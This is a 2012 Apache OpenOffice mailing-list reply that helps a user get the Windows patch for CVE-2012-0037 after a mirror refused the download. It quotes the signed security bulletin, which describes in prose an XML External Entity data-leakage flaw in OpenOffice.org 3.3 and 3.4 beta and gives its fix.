Mailing-List: contact ooo-users-help@incubator.apache.org; run by ezmlm
Precedence: bulk
Reply-To: ooo-users@incubator.apache.org
MIME-Version: 1.0
In-Reply-To: <1333220612.42605.YahooMailClassic@web160106.mail.bf1.yahoo.com>
References: <1333220612.42605.YahooMailClassic@web160106.mail.bf1.yahoo.com>
Date: Sat, 31 Mar 2012 15:33:23 -0400
Message-ID: 
 <CAP-ksoi2KkEHSiFEuYUj4HaahM6QNnsaEfP9UAQ9wNg3p9CS+A@mail.gmail.com>
Subject: Re: ADDITIONAL INFO,
 Re: CVE-2012-0037: OpenOffice.org data leakage vulnerability
From: Rob Weir <robweir@apache.org>
To: ooo-users@incubator.apache.org
Cc: Henri <strikeupdband@yahoo.com>
Content-Type: multipart/alternative; boundary=20cf30780acec235d504bc8f0792

--20cf30780acec235d504bc8f0792
Content-Type: text/plain; charset=UTF-8

On Sat, Mar 31, 2012 at 3:03 PM, Henri <strikeupdband@yahoo.com> wrote:

>
>
> --- On Sat, 3/31/12, Henri <strikeupdband@yahoo.com> wrote:
>
> From: Henri <strikeupdband@yahoo.com>
> Subject: Re: CVE-2012-0037: OpenOffice.org data leakage vulnerability
> To: ooo-announce@incubator.apache.org
> Date: Saturday, March 31, 2012, 11:50 AM
>
> Trying to access patch to download  from main site
> http://mirror.atlanticmetro.net/apache/incubator/ooo/3.3/patches/cve-2012-0037/CVE-2012-0037-win.zip  results
> in this reply :
>
> ForbiddenYou don't have permission to access
> /apache/incubator/ooo/3.3/patches/cve-2012-0037/CVE-2012-0037-win.zip on
> this server.Apache/2.2.3 (CentOS) Server at mirror.atlanticmetro.net Port
> 80
>
> Please advise. Thanks
>

The main download link for the patch on Windows is this:

http://www.apache.org/dyn/closer.cgi/incubator/ooo/3.3/patches/cve-2012-0037/CVE-2012-0037-win.zip

When you click that link, we try to find a mirror server closest to you.
This helps us balance the load and helps you find a server that is local,
and therefor likely faster.

Sometimes this fails and the closest mirror server is missing this file, or
is down, or otherwise not functioning properly.  When that happens simply
try another mirror from the long list presented to you.

Regards,

-Rob


>
> Henri
>
>
> --- On Thu, 3/22/12, Rob Weir <robweir@apache.org> wrote:
>
> From: Rob Weir <robweir@apache.org>
> Subject: CVE-2012-0037: OpenOffice.org data leakage vulnerability
> To: ooo-users@incubator.apache.org
> Date: Thursday, March 22, 2012, 6:16 AM
>
> Please note, this is the official security bulletin, targeted for
> security professionals.  If you are an OpenOffice.org 3.3 user, and
> are able to apply the mentioned
>  patch, then you are encouraged to do
> so.  If someone else supports or manages your desktop, then please
> forward this information to them.
>
> Additional support is available on our Community Forums:
>
> http://user.services.openoffice.org/
>
> And via our ooo-users mailing list:
>
>
> http://incubator.apache.org/openofficeorg/mailing-lists.html#users-mailing-list
>
> Note:  This security patch for OpenOffice.org is made available to
> legacy OpenOffice.org users as a service by the Apache OpenOffice
> Project Management Committee.  The patch is made available under the
> Apache License, and due to its importance, we are releasing it outside
> of the standard release cycle.
>
> -Rob
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash:
>  SHA512
>
> CVE-2012-0037: OpenOffice.org data leakage vulnerability
>
> Severity: Important
>
> Vendor: The Apache Software Foundation
>
> Versions Affected: OpenOffice.org 3.3 and 3.4 Beta, on all platforms.
> Earlier versions may be also affected.
>
> Description: An XML External Entity (XXE) attack is possible in the
> above versions of OpenOffice.org.  This vulnerability exploits the way
> in
> which external entities are processed in certain XML components of ODF
> documents.  By crafting an external entity to refer to other local
> file system
> resources, an attacker would be able to inject contents of other
> locally- accessible files into the ODF document, without the user's
> knowledge or permission.  Data leakage then becomes possible when that
> document is later distributed to other parties.
>
> Mitigation: OpenOffice.org 3.3.0 and 3.4 beta users should install the
> patch at:  http://www.openoffice.org/security/cves/CVE-2012-0037.html
>
> This vulnerability is also fixed in Apache OpenOffice 3.4 dev
> snapshots since March 1st, 2012.
>
> Source and Building: Information on obtaining the source code for this
> patch, and for porting it or adapting it to OpenOffice.org derivatives
> can be found here:
> http://www.openoffice.org/security/cves/CVE-2012-0037-src.txt
>
> Credit: The Apache OpenOffice project acknowledges and thanks the
> discoverer of this issue, Timothy D. Morgan of Virtual Security
> Research, LLC.
>
> References: http://security.openoffice.org
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.11
>  (GNU/Linux)
>
> iQIcBAEBCgAGBQJPayGmAAoJEGFAoYdHzLzHJVcP/jXzY+ROwPTAaSItCc4GAn2q
> Gm3uL9D9aRrs/pp+sofRkF9L3nyWEyyVfvZv6+IBrqOU/2Tu1CD8cY6Kns1ZYxVO
> ZRDiR5hhr3pA6KfWlb9W9it/8JsTF7WZfTX0uRMPXCYlJuYQ38Nl7kloPYswXG2w
> By2J19VanlHuwLQJoNV08652HBDy2Xpa6Wk7N5NoyETILOS47QTgizjAYZ2AY0GE
> ykBFu9A9yblLM5zftuMT/4FxkHQ8Qx5I3NmV3V8cUgJlmbc2oscsC23iIPcoulJF
> GSn8tub/e47xzgpJy69NoHgzmb6Ou+J3BDXr0kmH008P6FaTpTgPTltZ8Fcua+T2
> JSWjzW5IBOW/20J9RN+5lkDJQTY5FiqqpjV7H6bZV3+MVx3Fk/ih1uJPr2cVZqaT
> pDU5xtn79py7MNsmpjnzD7mPbdiA2OfStzFpqUM60HOki7RgGpozvUPEvA0uIss9
> X/jP1KixPDdbGS2fMrM7KG9mnT8BOzwow0Vti7alP2x2BkTXZm2K/qflXJDFCxTn
> g23OJIxlnhC8cK4etyezWNMSya4LLMgz6ZO+TEdvCSaaF6b3t6seskgnFAMcdPHY
> bkfzzYnACtrvQAmRQ1Nn4i1yFGAY+cTE7sUO2NcFhHn6jXaiZFEatdh4XJEEcTXl
> OZE/3v6XnehMD/32kipa
> =/qce
> -----END PGP SIGNATURE-----
>

--20cf30780acec235d504bc8f0792--